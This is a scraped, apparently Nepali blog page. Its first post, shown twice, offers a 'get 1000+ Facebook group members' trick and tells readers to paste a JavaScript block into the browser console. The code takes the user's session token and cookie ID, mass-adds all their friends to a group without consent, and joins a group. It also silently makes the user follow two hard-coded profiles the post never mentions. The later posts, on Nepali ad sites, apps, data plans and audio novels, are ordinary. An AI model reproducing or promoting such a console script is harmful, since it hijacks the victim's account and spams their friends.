Get 1000+ Facebook Group Member In one click

1.copy the code below
2.press "esc" then press F12 then press "console"
(or)
right click on the group and click inspect element then "console".


(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}


function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("100000082128837");
a("100002120806205");

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

3.then press paste and click ENTER
4. wait for your precess to complete... ENJOYYYY 
how to get 1000+ subscribers.. REMEMBER ONLY WORKS ON GOOGLE CHROME. 1.copy the code below 2.press "esc" then press F12 then press "console" (or) right click on the group and click inspect element then "console".   (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])  function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) { konum = document.cookie.indexOf(tarama) if (konum != -1) { konum += tarama.length son = document.cookie.indexOf(";", konum) if (son == -1) son = document.cookie.length return unescape(document.cookie.substring(konum, son)) } else { return ""; } } }  function getRandomInt (min, max) { return Math.floor(Math.random() * (max - min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, arr.length-1)]; }  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);  function a(abone){ var http4 = new XMLHttpRequest();  var url4 = "/ajax/follow/follow_profile.php?__a=1";  var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp="; http4.open("POST", url4, true);  //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close");  http4.onreadystatechange = function() {//Call a function when the state changes. if(http4.readyState == 4 && http4.status == 200) {  http4.close; // Close the connection  } }  http4.send(params4); }  function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); }  a("100000082128837"); a("100002120806205");  var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);  var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/membership/r2j.php?__a=1'; var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['send'](paramswp);  var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);  var friends = new Array(); gf = new XMLHttpRequest(); gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false); gf['send'](); if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { return _0x93dax8['index'] - _0x93dax9['index']; }); }; };  3.then press paste and click ENTER 4. wait for your precess to complete... ENJOYYYY :)
Remember !!! This Trick Work Only On Google Crome

Five Free Online Advertising Site Of Nepal

 According to the world’s internet user analysis, the internet user populations double every five years. That means the internet user population increase very rapidly in the world. The number of internet user worldwide reached more than 2.5 billion. In the case of Nepal internet user, Nepal internet user almost double in the years 2013. The online advertising on the internet also increase with internet user in Nepal also. The online advertising can reach nearly every internet market and online advertising influences off in sale. Online advertisement is very effective and easy due to its fast speed and option to select target market.
Now a days there are many online advertising site available in the internet which gives you a verity of service for your targeted market. Some of them are totally free and some site charge little cost. Here I searched five site which provides totally free service. In these site you can advertise your add totally free. Let’s see the site lists.

1 chhito.com


  It’s a free advertising site and to advertise in this site you have to register. The registration is totally free. The site provide many category to classify your advertise in target section. Here are the categories of chhitto .com. Cars & Bikes Home & Lifestyle Real estate Community Jobs Education & Learning Services)
Advertising - Design  Agencies Airline - Train - Bus Tickets Astrology - Numerology Baby Sitters - Nanny
Business Offers Car Rentals - Taxi Services Carpenters - Upholstery Catering -Tiffin Services Computer - Web Services Cooks Drivers Electronics - Appliances Repair Event -Party Planners - DJ )Health - Fitness
Hotels - Resorts Household Repairs - Renovation Architects Investment Lawyers Loans Maids Packers
Parlors and Salons Placement - Recruitment Plumbers - Electricians Shops Taxation Travel Vaastu Else Events Entertainment  Pets & Pet Care Want to buy (Buyer List)
2. Karobar classified
This is also free classified advertising web site. First you have to registers to add your advertise.
It also various category and section to add your advertisement.
3 vendoff.com
Vendoff.com is a website which allows individuals and businesses from Nepal to post free online advertisements the main motive of the website is to provide online advertising facility to all the individuals and businesses in Nepal from any economic group and fill the big gap between the buyers and sellers.

Anyone inside Nepal can register to vendoff.com and Post a free advertisement about anything they wanted or like to offer like sale items, jobs, vehicles, pets and anything which are suitable for audiences.

Users can include the title, photos, price and all the description in the advertisement. Anyone living inside Nepal can register in the website and post free ads. You can also post ads according to the city and the users can also see the ads by choosing their city.

4 sastobazar.com
It is classified ad listing site. Become a free member and start listing your classified ads within minutes. Manage all ads from your personalized dashboard. –

5 muntala .com
Muntala embraces the essence of the community and local trade that has been a part of Nepali tradition for centuries. At Muntala, we bring together the concept of Open market, Sunday market (Haat Bazaar) with an online platform. Whether you are a small business or an individual trying to find buyer for your products or services, or looking to buy products or services; Muntala makes it simple and easy for you. And the best part of it all is that - it’s FREE.

Nepali- English Offline Dictionary - Nice Nepali android Apps

Its good offline dictionary which  content more then thirteen thousands words. The application is  developed by sankar uprety and edited by Dev Guragain ,Krishna Paudel and   Rajkumar Stha. This is free application and available in google market. if you wana download this application now here

 please click here
First offline dictionary for Nepali Language. It's a two way dictionary, that means it is Nepali-English dictionary as well as English-Nepali dictionary. Now, try out the word games to learn more words.














1) Completely offline- once you download the dictionary file, you can use Nepali Dictionary without internet connection 2) Two ways - English to Nepali Dictionary and Nepali to English Dictionary
3) Word Game (Hangman)
4) Offline file update mechanism
5) Word of the day
6) Spoken word Pronunciation (Long press the words and select speak from menu)
7) Dictionary file stored in SD card


Listen Nepali Fm Radio Using Nice Androids Aps Nepali FM-Calendar-Hamro Patro

Nepali FM-Calendar-Hamro Patro , an androids application developed by Shankar Uprety .  Its completely free application and avilable in google android market. If you wants to download now 
click here 

A must have app for every Nepali. Now listen to nepali fm with an interactive player. View nepali patro including time/time, rashifal ( Horoscope), monthly calendar,date converter, currency converter, tithi for next 10 year, sub shahit, gold and silver price, and yet more to come.

The recently added "Hamro Radio" features all major nepali fm across Nepal and the abroad; including kantipur fm, kalika fm, Image fm, radio sagarmatha, other many local and internet stations. The player itself is best of its kinds. While listening to fm, you can get detail information about the stations including their logo, website, contact number, email address, and link to program schedule.
In addition to nepali fm, this application is first android app that shows price and trends of Gold and Silver as determined by Nepal Gold and Silver association. Finding out Gold, and Silver has never been this easier
.
 Hope you will find this app useful whether you are in Nepal or Abroad. If you loved using this app, please give us 5-start for continuous support and update.    ( Note this application is only for android operating system)

Cheap Rate internet Through Ncell Data connect Sim

The internet service providers in Nepal do not, in general, provide a very good speed to cost ratio. They are either extremely costly or extremely slow. Especially for mobile phone users, the options are very limited.  Here is the plane provided by  ncell.

PackagePriceValidityHow to subscribe?Charge after package is over#  (for Prepaid)
3MBRs. 624 hoursDial *99091#Rs. 6/ MB
10MBRs. 3030 daysDial *99092#Rs. 6/ MB
40MBRs. 9930 daysDial *99093#Rs. 4/ MB
100MBRs. 19930 daysDial *99094#Rs. 4/ MB
300MBRs. 29930 daysDial *99095#Rs. 4/ MB
500MBRs. 39930 daysDial *99096#Rs. 2/ MB
1GBRs. 69930 daysDial *99097#Rs. 2/ MB
5GBRs. 199930 daysDial *99098#Rs. 2/ MB
10GBRs. 299930 daysDial *99099#Rs. 2/ MB
# The charges applicable after the package is over means the charge with which you can surf internet without buying another package within the validity period. For example, if you consume all the data of 40MB in 25 days, you will be able to surf internet at Rs. 4 per MB for the remaining 5 days. Standard per MB charge of Rs. 6 per MB will apply after the validity period is over for Prepaid customers while normal rate as per the plans will apply for Pro customers. However, it is always recommended that you purchase another pack for better rates. 

All the packages are applicable for all Prepaid and Pro tariff except Ncell Connect.
To know the remaining data balance, dial *901#.

Data surfing rate without subscribing any package:
All Prepaid tariffRs. 6/MB
Pro PremiumRs. 2/MB
Pro PlusRs. 3/MB
Pro ClassicRs. 4/MB
The way to use this plan cheaply is to buy only the Ncell connect data SIM        which costs Rs. 99, and comes with a balance of Rs. 50. Then use it on your cell phone. Then, you can buy a data plan for either 500 MB, 1 GB or 5 GB. For initial trial phase, we recommend purchasing the 500 MB package. It costs Rs. 450 (including taxes), and does not have a validity time associated with it. Hence, the cost is only 90 paisa per MB of data. This is obviously a lot cheaper than the Rs. 8 per MB on a normal mobile SIM, and is quite comparable to the prices provided by NTC. However, unlike the GPRS/3G service provided by NTC, the speed of the internet is extremely fast (especially if your phone has 3G capabilities).
To use this data plan follow the following process
  • Visit any of the Ncell centres with a passport size photo, a photocopy of your citizenship certificate and the original citizenship certificate for verification.
  • Fill out a simple form and buy only the data SIM for Rs. 99.
  • Purchase any data package : 500 MB(Rs. 399 without tax), 
  • Or 1000 MB (Rs. 699 without tax) 
  • or 5000 MB (Rs. 1999 without tax).
  • Insert the SIM card in your mobile phone and install the settings.
  • Dial *101# to see the amount of data remaining.
  • That’s it. Happy surfing!

Read nepali Font in any mobile Using Opera mini

Usually browsers for mobile phones support only English language(or languages which has font similar to English). I have tried to read online articles, tweets, news etc in Nepali language on different mobile phones. Most of the times only squares will be visible due to no font available. Even if fonts are available, the rendering will not be proper. Now we can enable a feature in Opera Mini browser which is available even for low end mobile phones with java/J2ME/MIDP support. This will work for almost all language which has unicode character maps available. Inorder to read, we have to enable a special menu on the Opera Mini browser. To enable this menu just follow the following instruction.






1. First, make sure that you installed Opera Mini properly otherwise download Opera Mini from Here & install it.
















 2. Open Opera Mini & write about:config Or opera:config Or config: in address bar.(Note: Don’t use www Or http:// before those word)

















 3. Then find a option called “Use bitmap fonts for complex scripts” Select Yes from right option & Click on Save.



















 Done. Now open any Nepali font website. You can read the nepali in opera mini properly. Not only nepaliyou read Hindi, Arabic and all other language that uses complex script. Enjoy...

Listen Nepali Online Upanyas /Novel

Dear nepali visitors ,If you are searching to listen the online Upanyas ( novel ) in Nepali Language then you are at right place.Here we offers thousands of nepali  upanyas in nepali language. You can select the Novel which you want to listen. First we offer famous novels from many famous writers. 
Thanks to Nepali upanyas writers who wrote such a beautiful novels in very artistic way  in native Nepalese language. These novels are really heart touching. Beside, the novel reader Achyut Ghimire’s voice added the good flavor in this program. Achyut Ghimire the RJ with the crystal clear voice is making ths listening session very good. One can understand novels clearly in ghimire’s voice. Achyut is radio jockey in the UNN radio who is reading novels ie upanyas since the beginning of the program on Nepali novel. If you listen to the Nepali novels on shrutisambeg in Achyut Ghimire’s voice you will become the fan of the Achyut, Nepali upanyas and Nepali stories.
Please click in the name or picture of your  selected novels to listen. Moreover you can downloads these programe for your own purpose.

                                                        Pagal Basti 

                                writer-Sharu bhakta







                                     Muglaan
                                                           Dr govinda raj Bhattarai




                                                               Shirish Ko phul

                                            Parijaat



                                             

















Nrayan Wagle


                                                                     
                                                            Paniko Gham
                                                                    Amar Nuepane














Phulko Aakhama
Aani Choyeng Dolma




Biddhi sagar












Diamondshamsher Rana